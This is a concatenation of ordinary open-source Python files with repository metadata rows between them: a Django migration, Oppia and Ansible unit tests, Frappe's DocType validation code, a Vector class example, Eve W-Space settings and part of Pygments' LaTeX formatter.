name='Creator',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50)),
('pseudo', models.CharField(max_length=50)),
('registered', models.DateTimeField(verbose_name=b'Date Registered')),
('avatar', models.ImageField(upload_to=b'')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Episode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('number', models.IntegerField()),
('rating', models.IntegerField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Season',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('number', models.IntegerField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Show',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50)),
('rating', models.IntegerField()),
('created', models.DateTimeField(verbose_name=b'Date Created')),
('creator', models.ForeignKey(to='mediaplayer.Creator')),
('genre', models.ForeignKey(to='mediaplayer.Genre')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Studio',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50)),
('icon', models.ImageField(upload_to=b'')),
('creator', models.ForeignKey(to='mediaplayer.Creator')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='show',
name='studio',
field=models.ForeignKey(to='mediaplayer.Studio'),
preserve_default=True,
),
migrations.AddField(
model_name='season',
name='show',
field=models.ForeignKey(to='mediaplayer.Show'),
preserve_default=True,
),
migrations.AddField(
model_name='episode',
name='season',
field=models.ForeignKey(to='mediaplayer.Season'),
preserve_default=True,
),
migrations.AddField(
model_name='episode',
name='show',
field=models.ForeignKey(to='mediaplayer.Show'),
preserve_default=True,
),
]
| mit | -286,532,153,139,026,600 | 35.807018 | 114 | 0.511916 | false |
VictoriaRoux/oppia | core/domain/value_generators_domain_test.py | 34 | 1211 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Sean Lip'
from core.domain import value_generators_domain
import test_utils
class ValueGeneratorsUnitTests(test_utils.GenericTestBase):
"""Test the value generator registry."""
def test_value_generator_registry(self):
COPIER_ID = 'Copier'
copier = value_generators_domain.Registry.get_generator_class_by_id(
COPIER_ID)
self.assertEqual(copier().id, COPIER_ID)
all_generator_classes = (
value_generators_domain.Registry.get_all_generator_classes())
self.assertEqual(len(all_generator_classes), 4)
| apache-2.0 | -374,436,367,218,607,360 | 33.6 | 76 | 0.720066 | false |
anandpdoshi/frappe | frappe/core/doctype/doctype/doctype.py | 2 | 21596 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import re
import MySQLdb
import frappe
from frappe import _
from frappe.utils import now, cint
from frappe.model import no_value_fields
from frappe.model.document import Document
from frappe.custom.doctype.property_setter.property_setter import make_property_setter
from frappe.desk.notifications import delete_notification_count_for
from frappe.modules import make_boilerplate
from frappe.model.db_schema import validate_column_name
class InvalidFieldNameError(frappe.ValidationError): pass
form_grid_templates = {
"fields": "templates/form_grid/fields.html"
}
class DocType(Document):
def get_feed(self):
return self.name
def validate(self):
"""Validate DocType before saving.
- Check if developer mode is set.
- Validate series
- Check fieldnames (duplication etc)
- Clear permission table for child tables
- Add `amended_from` and `ameneded_by` if Amendable"""
self.check_developer_mode()
self.validate_name()
if self.issingle:
self.allow_import = 0
self.is_submittable = 0
self.istable = 0
elif self.istable:
self.allow_import = 0
self.validate_series()
self.scrub_field_names()
self.validate_document_type()
validate_fields(self)
if self.istable:
# no permission records for child table
self.permissions = []
else:
validate_permissions(self)
self.make_amendable()
self.validate_website()
def check_developer_mode(self):
"""Throw exception if not developer mode or via patch"""
if frappe.flags.in_patch:
return
if not frappe.conf.get("developer_mode") and not self.custom:
frappe.throw(_("Not in Developer Mode! Set in site_config.json or make 'Custom' DocType."))
def validate_document_type(self):
if self.document_type=="Transaction":
self.document_type = "Document"
if self.document_type=="Master":
self.document_type = "Setup"
def validate_website(self):
"""Ensure that website generator has field 'route'"""
from frappe.model.base_document import get_controller
try:
controller = get_controller(self.name)
except:
controller = None
if controller and getattr(controller, 'website', None):
if not 'route' in [d.fieldname for d in self.fields]:
frappe.throw('Field "route" is mandatory for Website Generator pages', title='Missing Field')
def change_modified_of_parent(self):
"""Change the timestamp of parent DocType if the current one is a child to clear caches."""
if frappe.flags.in_import:
return
parent_list = frappe.db.sql("""SELECT parent
from tabDocField where fieldtype="Table" and options=%s""", self.name)
for p in parent_list:
frappe.db.sql('UPDATE tabDocType SET modified=%s WHERE `name`=%s', (now(), p[0]))
def scrub_field_names(self):
"""Sluggify fieldnames if not set from Label."""
restricted = ('name','parent','creation','modified','modified_by',
'parentfield','parenttype',"file_list")
for d in self.get("fields"):
if d.fieldtype:
if (not getattr(d, "fieldname", None)):
if d.label:
d.fieldname = d.label.strip().lower().replace(' ','_')
if d.fieldname in restricted:
d.fieldname = d.fieldname + '1'
else:
d.fieldname = d.fieldtype.lower().replace(" ","_") + "_" + str(d.idx)
# fieldnames should be lowercase
d.fieldname = d.fieldname.lower()
def validate_series(self, autoname=None, name=None):
"""Validate if `autoname` property is correctly set."""
if not autoname: autoname = self.autoname
if not name: name = self.name
if not autoname and self.get("fields", {"fieldname":"naming_series"}):
self.autoname = "naming_series:"
if autoname and (not autoname.startswith('field:')) \
and (not autoname.startswith('eval:')) \
and (not autoname.lower() in ('prompt', 'hash')) \
and (not autoname.startswith('naming_series:')):
prefix = autoname.split('.')[0]
used_in = frappe.db.sql('select name from tabDocType where substring_index(autoname, ".", 1) = %s and name!=%s', (prefix, name))
if used_in:
frappe.throw(_("Series {0} already used in {1}").format(prefix, used_in[0][0]))
def on_update(self):
"""Update database schema, make controller templates if `custom` is not set and clear cache."""
from frappe.model.db_schema import updatedb
updatedb(self.name, self)
self.change_modified_of_parent()
make_module_and_roles(self)
from frappe import conf
if not self.custom and not (frappe.flags.in_import or frappe.flags.in_test) and conf.get('developer_mode'):
self.export_doc()
self.make_controller_template()
# update index
if not self.custom:
self.run_module_method("on_doctype_update")
if self.flags.in_insert:
self.run_module_method("after_doctype_insert")
delete_notification_count_for(doctype=self.name)
frappe.clear_cache(doctype=self.name)
def run_module_method(self, method):
from frappe.modules import load_doctype_module
module = load_doctype_module(self.name, self.module)
if hasattr(module, method):
getattr(module, method)()
def before_rename(self, old, new, merge=False):
"""Throw exception if merge. DocTypes cannot be merged."""
if not self.custom and frappe.session.user != "Administrator":
frappe.throw(_("DocType can only be renamed by Administrator"))
self.check_developer_mode()
self.validate_name(new)
if merge:
frappe.throw(_("DocType can not be merged"))
def after_rename(self, old, new, merge=False):
"""Change table name using `RENAME TABLE` if table exists. Or update
`doctype` property for Single type."""
if self.issingle:
frappe.db.sql("""update tabSingles set doctype=%s where doctype=%s""", (new, old))
else:
frappe.db.sql("rename table `tab%s` to `tab%s`" % (old, new))
def before_reload(self):
"""Preserve naming series changes in Property Setter."""
if not (self.issingle and self.istable):
self.preserve_naming_series_options_in_property_setter()
def preserve_naming_series_options_in_property_setter(self):
"""Preserve naming_series as property setter if it does not exist"""
naming_series = self.get("fields", {"fieldname": "naming_series"})
if not naming_series:
return
# check if atleast 1 record exists
if not (frappe.db.table_exists(self.name) and frappe.db.sql("select name from `tab{}` limit 1".format(self.name))):
return
existing_property_setter = frappe.db.get_value("Property Setter", {"doc_type": self.name,
"property": "options", "field_name": "naming_series"})
if not existing_property_setter:
make_property_setter(self.name, "naming_series", "options", naming_series[0].options, "Text", validate_fields_for_doctype=False)
if naming_series[0].default:
make_property_setter(self.name, "naming_series", "default", naming_series[0].default, "Text", validate_fields_for_doctype=False)
def export_doc(self):
"""Export to standard folder `[module]/doctype/[name]/[name].json`."""
from frappe.modules.export_file import export_to_files
export_to_files(record_list=[['DocType', self.name]])
def import_doc(self):
"""Import from standard folder `[module]/doctype/[name]/[name].json`."""
from frappe.modules.import_module import import_from_files
import_from_files(record_list=[[self.module, 'doctype', self.name]])
def make_controller_template(self):
"""Make boilderplate controller template."""
make_boilerplate("controller.py", self)
if not (self.istable or self.issingle):
make_boilerplate("test_controller.py", self.as_dict())
if not self.istable:
make_boilerplate("controller.js", self.as_dict())
def make_amendable(self):
"""If is_submittable is set, add amended_from docfields."""
if self.is_submittable:
if not frappe.db.sql("""select name from tabDocField
where fieldname = 'amended_from' and parent = %s""", self.name):
self.append("fields", {
"label": "Amended From",
"fieldtype": "Link",
"fieldname": "amended_from",
"options": self.name,
"read_only": 1,
"print_hide": 1,
"no_copy": 1
})
def get_max_idx(self):
"""Returns the highest `idx`"""
max_idx = frappe.db.sql("""select max(idx) from `tabDocField` where parent = %s""",
self.name)
return max_idx and max_idx[0][0] or 0
def validate_name(self, name=None):
if not name:
name = self.name
# a DocType's name should not start with a number or underscore
# and should only contain letters, numbers and underscore
is_a_valid_name = re.match("^(?![\W])[^\d_\s][\w -]+$", name, re.UNICODE)
if not is_a_valid_name:
frappe.throw(_("DocType's name should start with a letter and it can only consist of letters, numbers, spaces and underscores"), frappe.NameError)
def validate_fields_for_doctype(doctype):
validate_fields(frappe.get_meta(doctype, cached=False))
# this is separate because it is also called via custom field
def validate_fields(meta):
"""Validate doctype fields. Checks
1. There are no illegal characters in fieldnames
2. If fieldnames are unique.
3. Fields that do have database columns are not mandatory.
4. `Link` and `Table` options are valid.
5. **Hidden** and **Mandatory** are not set simultaneously.
7. `Check` type field has default as 0 or 1.
8. `Dynamic Links` are correctly defined.
9. Precision is set in numeric fields and is between 1 & 6.
10. Fold is not at the end (if set).
11. `search_fields` are valid.
12. `title_field` and title field pattern are valid.
13. `unique` check is only valid for Data, Link and Read Only fieldtypes.
14. `unique` cannot be checked if there exist non-unique values.
:param meta: `frappe.model.meta.Meta` object to check."""
def check_illegal_characters(fieldname):
validate_column_name(fieldname)
def check_unique_fieldname(fieldname):
duplicates = filter(None, map(lambda df: df.fieldname==fieldname and str(df.idx) or None, fields))
if len(duplicates) > 1:
frappe.throw(_("Fieldname {0} appears multiple times in rows {1}").format(fieldname, ", ".join(duplicates)))
def check_illegal_mandatory(d):
if (d.fieldtype in no_value_fields) and d.fieldtype!="Table" and d.reqd:
frappe.throw(_("Field {0} of type {1} cannot be mandatory").format(d.label, d.fieldtype))
def check_link_table_options(d):
if d.fieldtype in ("Link", "Table"):
if not d.options:
frappe.throw(_("Options requried for Link or Table type field {0} in row {1}").format(d.label, d.idx))
if d.options=="[Select]" or d.options==d.parent:
return
if d.options != d.parent:
options = frappe.db.get_value("DocType", d.options, "name")
if not options:
frappe.throw(_("Options must be a valid DocType for field {0} in row {1}").format(d.label, d.idx))
else:
# fix case
d.options = options
def check_hidden_and_mandatory(d):
if d.hidden and d.reqd and not d.default:
frappe.throw(_("Field {0} in row {1} cannot be hidden and mandatory without default").format(d.label, d.idx))
def check_width(d):
if d.fieldtype == "Currency" and cint(d.width) < 100:
frappe.throw(_("Max width for type Currency is 100px in row {0}").format(d.idx))
def check_in_list_view(d):
if d.in_list_view and (d.fieldtype in no_value_fields):
frappe.throw(_("'In List View' not allowed for type {0} in row {1}").format(d.fieldtype, d.idx))
def check_dynamic_link_options(d):
if d.fieldtype=="Dynamic Link":
doctype_pointer = filter(lambda df: df.fieldname==d.options, fields)
if not doctype_pointer or (doctype_pointer[0].fieldtype not in ("Link", "Select")) \
or (doctype_pointer[0].fieldtype=="Link" and doctype_pointer[0].options!="DocType"):
frappe.throw(_("Options 'Dynamic Link' type of field must point to another Link Field with options as 'DocType'"))
def check_illegal_default(d):
if d.fieldtype == "Check" and d.default and d.default not in ('0', '1'):
frappe.throw(_("Default for 'Check' type of field must be either '0' or '1'"))
if d.fieldtype == "Select" and d.default and (d.default not in d.options.split("\n")):
frappe.throw(_("Default for {0} must be an option").format(d.fieldname))
def check_precision(d):
if d.fieldtype in ("Currency", "Float", "Percent") and d.precision is not None and not (1 <= cint(d.precision) <= 6):
frappe.throw(_("Precision should be between 1 and 6"))
def check_unique_and_text(d):
if meta.issingle:
d.unique = 0
d.search_index = 0
if getattr(d, "unique", False):
if d.fieldtype not in ("Data", "Link", "Read Only"):
frappe.throw(_("Fieldtype {0} for {1} cannot be unique").format(d.fieldtype, d.label))
if not d.get("__islocal"):
try:
has_non_unique_values = frappe.db.sql("""select `{fieldname}`, count(*)
from `tab{doctype}` group by `{fieldname}` having count(*) > 1 limit 1""".format(
doctype=d.parent, fieldname=d.fieldname))
except MySQLdb.OperationalError, e:
if e.args and e.args[0]==1054:
# ignore if missing column, else raise
# this happens in case of Custom Field
pass
else:
raise
else:
# else of try block
if has_non_unique_values and has_non_unique_values[0][0]:
frappe.throw(_("Field '{0}' cannot be set as Unique as it has non-unique values").format(d.label))
if d.search_index and d.fieldtype in ("Text", "Long Text", "Small Text", "Code", "Text Editor"):
frappe.throw(_("Fieldtype {0} for {1} cannot be indexed").format(d.fieldtype, d.label))
def check_fold(fields):
fold_exists = False
for i, f in enumerate(fields):
if f.fieldtype=="Fold":
if fold_exists:
frappe.throw(_("There can be only one Fold in a form"))
fold_exists = True
if i < len(fields)-1:
nxt = fields[i+1]
if nxt.fieldtype != "Section Break":
frappe.throw(_("Fold must come before a Section Break"))
else:
frappe.throw(_("Fold can not be at the end of the form"))
def check_search_fields(meta):
"""Throw exception if `search_fields` don't contain valid fields."""
if not meta.search_fields:
return
fieldname_list = [d.fieldname for d in fields]
for fieldname in (meta.search_fields or "").split(","):
fieldname = fieldname.strip()
if fieldname not in fieldname_list:
frappe.throw(_("Search field {0} is not valid").format(fieldname))
def check_title_field(meta):
"""Throw exception if `title_field` isn't a valid fieldname."""
if not meta.get("title_field"):
return
fieldname_list = [d.fieldname for d in fields]
if meta.title_field not in fieldname_list:
frappe.throw(_("Title field must be a valid fieldname"), InvalidFieldNameError)
def _validate_title_field_pattern(pattern):
if not pattern:
return
for fieldname in re.findall("{(.*?)}", pattern, re.UNICODE):
if fieldname.startswith("{"):
# edge case when double curlies are used for escape
continue
if fieldname not in fieldname_list:
frappe.throw(_("{{{0}}} is not a valid fieldname pattern. It should be {{field_name}}.").format(fieldname),
InvalidFieldNameError)
df = meta.get("fields", filters={"fieldname": meta.title_field})[0]
if df:
_validate_title_field_pattern(df.options)
_validate_title_field_pattern(df.default)
def check_image_field(meta):
'''check image_field exists and is of type "Attach Image"'''
if not meta.image_field:
return
df = meta.get("fields", {"fieldname": meta.image_field})
if not df:
frappe.throw(_("Image field must be a valid fieldname"), InvalidFieldNameError)
if df[0].fieldtype != 'Attach Image':
frappe.throw(_("Image field must be of type Attach Image"), InvalidFieldNameError)
def check_timeline_field(meta):
if not meta.timeline_field:
return
fieldname_list = [d.fieldname for d in fields]
if meta.timeline_field not in fieldname_list:
frappe.throw(_("Timeline field must be a valid fieldname"), InvalidFieldNameError)
df = meta.get("fields", {"fieldname": meta.timeline_field})[0]
if df.fieldtype not in ("Link", "Dynamic Link"):
frappe.throw(_("Timeline field must be a Link or Dynamic Link"), InvalidFieldNameError)
fields = meta.get("fields")
for d in fields:
if not d.permlevel: d.permlevel = 0
if not d.fieldname:
frappe.throw(_("Fieldname is required in row {0}").format(d.idx))
d.fieldname = d.fieldname.lower()
check_illegal_characters(d.fieldname)
check_unique_fieldname(d.fieldname)
check_illegal_mandatory(d)
check_link_table_options(d)
check_dynamic_link_options(d)
check_hidden_and_mandatory(d)
check_in_list_view(d)
check_illegal_default(d)
check_unique_and_text(d)
check_fold(fields)
check_search_fields(meta)
check_title_field(meta)
check_timeline_field(meta)
def validate_permissions_for_doctype(doctype, for_remove=False):
"""Validates if permissions are set correctly."""
doctype = frappe.get_doc("DocType", doctype)
if frappe.conf.developer_mode and not frappe.flags.in_test:
# save doctype
doctype.save()
else:
validate_permissions(doctype, for_remove)
# save permissions
for perm in doctype.get("permissions"):
perm.db_update()
def validate_permissions(doctype, for_remove=False):
permissions = doctype.get("permissions")
if not permissions:
frappe.throw(_('Enter at least one permission row'), frappe.MandatoryError)
issingle = issubmittable = isimportable = False
if doctype:
issingle = cint(doctype.issingle)
issubmittable = cint(doctype.is_submittable)
isimportable = cint(doctype.allow_import)
def get_txt(d):
return _("For {0} at level {1} in {2} in row {3}").format(d.role, d.permlevel, d.parent, d.idx)
def check_atleast_one_set(d):
if not d.read and not d.write and not d.submit and not d.cancel and not d.create:
frappe.throw(_("{0}: No basic permissions set").format(get_txt(d)))
def check_double(d):
has_similar = False
similar_because_of = ""
for p in permissions:
if p.role==d.role and p.permlevel==d.permlevel and p!=d:
if p.apply_user_permissions==d.apply_user_permissions:
has_similar = True
similar_because_of = _("Apply User Permissions")
break
elif p.if_owner==d.if_owner:
similar_because_of = _("If Owner")
has_similar = True
break
if has_similar:
frappe.throw(_("{0}: Only one rule allowed with the same Role, Level and {1}")\
.format(get_txt(d), similar_because_of))
def check_level_zero_is_set(d):
if cint(d.permlevel) > 0 and d.role != 'All':
has_zero_perm = False
for p in permissions:
if p.role==d.role and (p.permlevel or 0)==0 and p!=d:
has_zero_perm = True
break
if not has_zero_perm:
frappe.throw(_("{0}: Permission at level 0 must be set before higher levels are set").format(get_txt(d)))
for invalid in ("create", "submit", "cancel", "amend"):
if d.get(invalid): d.set(invalid, 0)
def check_permission_dependency(d):
if d.cancel and not d.submit:
frappe.throw(_("{0}: Cannot set Cancel without Submit").format(get_txt(d)))
if (d.submit or d.cancel or d.amend) and not d.write:
frappe.throw(_("{0}: Cannot set Submit, Cancel, Amend without Write").format(get_txt(d)))
if d.amend and not d.write:
frappe.throw(_("{0}: Cannot set Amend without Cancel").format(get_txt(d)))
if d.get("import") and not d.create:
frappe.throw(_("{0}: Cannot set Import without Create").format(get_txt(d)))
def remove_rights_for_single(d):
if not issingle:
return
if d.report:
frappe.msgprint(_("Report cannot be set for Single types"))
d.report = 0
d.set("import", 0)
d.set("export", 0)
for ptype, label in (
("set_user_permissions", _("Set User Permissions")),
("apply_user_permissions", _("Apply User Permissions"))):
if d.get(ptype):
d.set(ptype, 0)
frappe.msgprint(_("{0} cannot be set for Single types").format(label))
def check_if_submittable(d):
if d.submit and not issubmittable:
frappe.throw(_("{0}: Cannot set Assign Submit if not Submittable").format(get_txt(d)))
elif d.amend and not issubmittable:
frappe.throw(_("{0}: Cannot set Assign Amend if not Submittable").format(get_txt(d)))
def check_if_importable(d):
if d.get("import") and not isimportable:
frappe.throw(_("{0}: Cannot set import as {1} is not importable").format(get_txt(d), doctype))
for d in permissions:
if not d.permlevel:
d.permlevel=0
check_atleast_one_set(d)
if not for_remove:
check_double(d)
check_permission_dependency(d)
check_if_submittable(d)
check_if_importable(d)
check_level_zero_is_set(d)
remove_rights_for_single(d)
def make_module_and_roles(doc, perm_fieldname="permissions"):
"""Make `Module Def` and `Role` records if already not made. Called while installing."""
try:
if not frappe.db.exists("Module Def", doc.module):
m = frappe.get_doc({"doctype": "Module Def", "module_name": doc.module})
m.app_name = frappe.local.module_app[frappe.scrub(doc.module)]
m.flags.ignore_mandatory = m.flags.ignore_permissions = True
m.insert()
default_roles = ["Administrator", "Guest", "All"]
roles = [p.role for p in doc.get("permissions") or []] + default_roles
for role in list(set(roles)):
if not frappe.db.exists("Role", role):
r = frappe.get_doc({"doctype": "Role", "role_name": role})
r.role_name = role
r.flags.ignore_mandatory = r.flags.ignore_permissions = True
r.insert()
except frappe.DoesNotExistError, e:
pass
except frappe.SQLError, e:
if e.args[0]==1146:
pass
else:
raise
def init_list(doctype):
"""Make boilerplate list views."""
doc = frappe.get_meta(doctype)
make_boilerplate("controller_list.js", doc)
make_boilerplate("controller_list.html", doc)
| mit | -1,331,930,829,922,321,200 | 34.519737 | 149 | 0.688461 | false |
t794104/ansible | test/units/modules/network/nxos/test_nxos_vrf.py | 68 | 3059 | # (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.nxos import nxos_vrf
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosVrfModule(TestNxosModule):
module = nxos_vrf
def setUp(self):
super(TestNxosVrfModule, self).setUp()
self.mock_load_config = patch('ansible.modules.network.nxos.nxos_vrf.load_config')
self.load_config = self.mock_load_config.start()
self.mock_run_commands = patch('ansible.modules.network.nxos.nxos_vrf.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestNxosVrfModule, self).tearDown()
self.mock_load_config.stop()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None, device=''):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for command in commands:
if isinstance(command, dict):
command = command['command']
filename = str(command).split(' | ')[0].replace(' ', '_')
output.append(load_fixture('nxos_vrf', filename))
return output
self.load_config.return_value = None
self.run_commands.side_effect = load_from_file
def test_nxos_vrf_present(self):
set_module_args(dict(vrf='ntc', state='present', admin_state='up'))
self.execute_module(changed=True, commands=['vrf context ntc', 'no shutdown', 'exit'])
def test_nxos_vrf_present_no_change(self):
set_module_args(dict(vrf='management', state='present', admin_state='up'))
self.execute_module(changed=False, commands=[])
def test_nxos_vrf_absent(self):
set_module_args(dict(vrf='management', state='absent'))
self.execute_module(changed=True, commands=['no vrf context management'])
def test_nxos_vrf_absent_no_change(self):
set_module_args(dict(vrf='ntc', state='absent'))
self.execute_module(changed=False, commands=[])
def test_nxos_vrf_default(self):
set_module_args(dict(vrf='default'))
result = self.execute_module(failed=True)
self.assertEqual(result['msg'], 'cannot use default as name of a VRF')
| gpl-3.0 | 5,271,322,226,520,757,000 | 37.721519 | 94 | 0.668846 | false |
zhuango/python | pythonLearning/oo/vector.py | 2 | 2835 | from array import array
import reprlib
import math
import numbers
import functools
import operator
import itertools
class Vector:
typecode = 'd'
def __init__(self, components):
self._components = array(self.typecode, components)
def __iter__(self):
return iter(self._components)
def __repr__(self):
components = reprlib.repr(self._components)
components = components[components.find('['):-1]
return 'Vector({})'.format(components)
def __str__(self):
return str(tuple(self))
def __bytes__(self):
return (bytes([ord(self.typecode)]) +
bytes(self._components))
def __eq__(self, other):
return (len(self) == len(other) and
all(a == b for a, b in zip(self, other)))
def __hash__(self):
hashed = (hash(x) for x in self)
return functools.reduce(operator.xor, hashes, 0)
def __abs__(self):
return math.sqrt(sum(x*x for x in self))
def __bool__(self):
return bool(abs(self))
def __len__(self):
return len(self._components)
def __getitem__(self, index):
cls = type(self)
if isinstance(index, slice):
return cls(self._components[index])
elif isinstance(index, numbers.Integral):
return self._components[index]
else:
msg = '{.__name__} indices must be integers'
raise TypeError(msg.format(cls))
shortcut_names = 'xyzt'
def __getattr__(self, name):
cls = type(self)
if len(name) == 1:
pos = cls.shortcur_names.find(name)
if 0 <= pos < len(self._components):
return self._components[pos]
msg = '{.__name__!r} object has no attribytes {!r}'
raise AttributeError(msg.format(cls, name))
def angle(self, n):
r = math.sqrt(sum(x*x for x in self[n:]))
a = math.atan2(r, self[n-1])
if (n == len(self) - 1) and (self[-1] < 0):
return math.pi * 2 - a
else:
return a
def angles(self):
return (self.angle(n) for n in range(1, len(self)))
def __format__(self, fmt_spec=''):
if fmt_spec.endswith('h'):
fmt_spec = fmt_spec[:-1]
coords = itertools.chain([abs(self)], self.angles())
outer_fmt = '<{}>'
else:
coords = self
outer_fmt = '({})'
components = (format(c, fmt_spec) for c in coords)
return outer_fmt.format(', '.join(components))
@classmethod
def frombytes(cls, octets):
typecode = chr(octets[0])
memv = memoryview(octets[1:]).cast(typecode)
return cls(memv)
print(format(Vector([-1, -1, -1, -1]), 'h'))
print(format(Vector([2, 2, 2, 2]), '.3eh'))
print(format(Vector([0, 1, 0, 0]), '0.5fh'))
| gpl-2.0 | 7,786,916,047,197,369,000 | 30.853933 | 64 | 0.54321 | false |
Zumochi/eve-wspace | evewspace/Map/default_settings.py | 5 | 1540 | # Eve W-Space
# Copyright 2014 Andrew Austin and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from core.models import ConfigEntry
#defaults = [("TEST_SETTING", "BOB")]
defaults = [
("MAP_PVP_THRESHOLD", "0"),
("MAP_NPC_THRESHOLD", "10"),
("MAP_SCAN_WARNING", "3"),
("MAP_INTEREST_TIME", "15"),
("MAP_ESCALATION_BURN", "3"),
("MAP_ADVANCED_LOGGING", "1"),
("MAP_ZEN_MODE", "0"),
("MAP_PILOT_LIST", "0"),
("MAP_DETAILS_COMBINED", "0"),
("MAP_RENDER_WH_TAGS", "1"),
("MAP_SCALING_FACTOR", "1"),
("MAP_HIGHLIGHT_ACTIVE", "1"),
("MAP_AUTO_REFRESH", "1"),
("MAP_KSPACE_MAPPING", "0"),
("MAP_SILENT_MAPPING", "0"),
("MAP_RENDER_COLLAPSED", "0"),
]
def load_defaults():
'''
Loads default configuration settings.
'''
for setting in defaults:
config = ConfigEntry.objects.get_or_create(name=setting[0],
user=None)[0]
config.value = setting[1]
config.save()
| apache-2.0 | -7,051,287,040,011,681,000 | 33.222222 | 76 | 0.612987 | false |
fusion809/fusion809.github.io-old | vendor/bundle/ruby/2.2.0/gems/pygments.rb-0.6.3/vendor/pygments-main/pygments/formatters/latex.py | 49 | 17273 | # -*- coding: utf-8 -*-
"""
pygments.formatters.latex
~~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for LaTeX fancyvrb output.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import division
from pygments.formatter import Formatter
from pygments.lexer import Lexer
from pygments.token import Token, STANDARD_TYPES
from pygments.util import get_bool_opt, get_int_opt, StringIO, xrange, \
iteritems
__all__ = ['LatexFormatter']
def escape_tex(text, commandprefix):
return text.replace('\\', '\x00'). \
replace('{', '\x01'). \
replace('}', '\x02'). \
replace('\x00', r'\%sZbs{}' % commandprefix). \
replace('\x01', r'\%sZob{}' % commandprefix). \
replace('\x02', r'\%sZcb{}' % commandprefix). \
replace('^', r'\%sZca{}' % commandprefix). \
replace('_', r'\%sZus{}' % commandprefix). \
replace('&', r'\%sZam{}' % commandprefix). \
replace('<', r'\%sZlt{}' % commandprefix). \
replace('>', r'\%sZgt{}' % commandprefix). \
replace('#', r'\%sZsh{}' % commandprefix). \
replace('%', r'\%sZpc{}' % commandprefix). \
replace('$', r'\%sZdl{}' % commandprefix). \
replace('-', r'\%sZhy{}' % commandprefix). \
replace("'", r'\%sZsq{}' % commandprefix). \
replace('"', r'\%sZdq{}' % commandprefix). \
replace('~', r'\%sZti{}' % commandprefix)
DOC_TEMPLATE = r'''
\documentclass{%(docclass)s}
\usepackage{fancyvrb}
\usepackage{color}
\usepackage[%(encoding)s]{inputenc}
%(preamble)s
%(styledefs)s
\begin{document}
\section*{%(title)s}
%(code)s
\end{document}
'''
## Small explanation of the mess below :)
#
# The previous version of the LaTeX formatter just assigned a command to
# each token type defined in the current style. That obviously is
# problematic if the highlighted code is produced for a different style
# than the style commands themselves.
#
# This version works much like the HTML formatter which assigns multiple
# CSS classes to each <span> tag, from the most specific to the least
# specific token type, thus falling back to the parent token type if one
# is not defined. Here, the classes are there too and use the same short
# forms given in token.STANDARD_TYPES.
#
# Highlighted code now only uses one custom command, which by default is
# \PY and selectable by the commandprefix option (and in addition the
# escapes \PYZat, \PYZlb and \PYZrb which haven't been renamed for
# backwards compatibility purposes).
#
# \PY has two arguments: the classes, separated by +, and the text to
# render in that style. The classes are resolved into the respective
# style commands by magic, which serves to ignore unknown classes.
#
# The magic macros are:
# * \PY@it, \PY@bf, etc. are unconditionally wrapped around the text
# to render in \PY@do. Their definition determines the style.
# * \PY@reset resets \PY@it etc. to do nothing.
# * \PY@toks parses the list of classes, using magic inspired by the
# keyval package (but modified to use plusses instead of commas
# because fancyvrb redefines commas inside its environments).
# * \PY@tok processes one class, calling the \PY@tok@classname command
# if it exists.
# * \PY@tok@classname sets the \PY@it etc. to reflect the chosen style
# for its class.
# * \PY resets the style, parses the classnames and then calls \PY@do.
#
# Tip: to read this code, print it out in substituted form using e.g.
# >>> print STYLE_TEMPLATE % {'cp': 'PY'}
STYLE_TEMPLATE = r'''
\makeatletter
\def\%(cp)s@reset{\let\%(cp)s@it=\relax \let\%(cp)s@bf=\relax%%
\let\%(cp)s@ul=\relax \let\%(cp)s@tc=\relax%%
\let\%(cp)s@bc=\relax \let\%(cp)s@ff=\relax}
\def\%(cp)s@tok#1{\csname %(cp)s@tok@#1\endcsname}
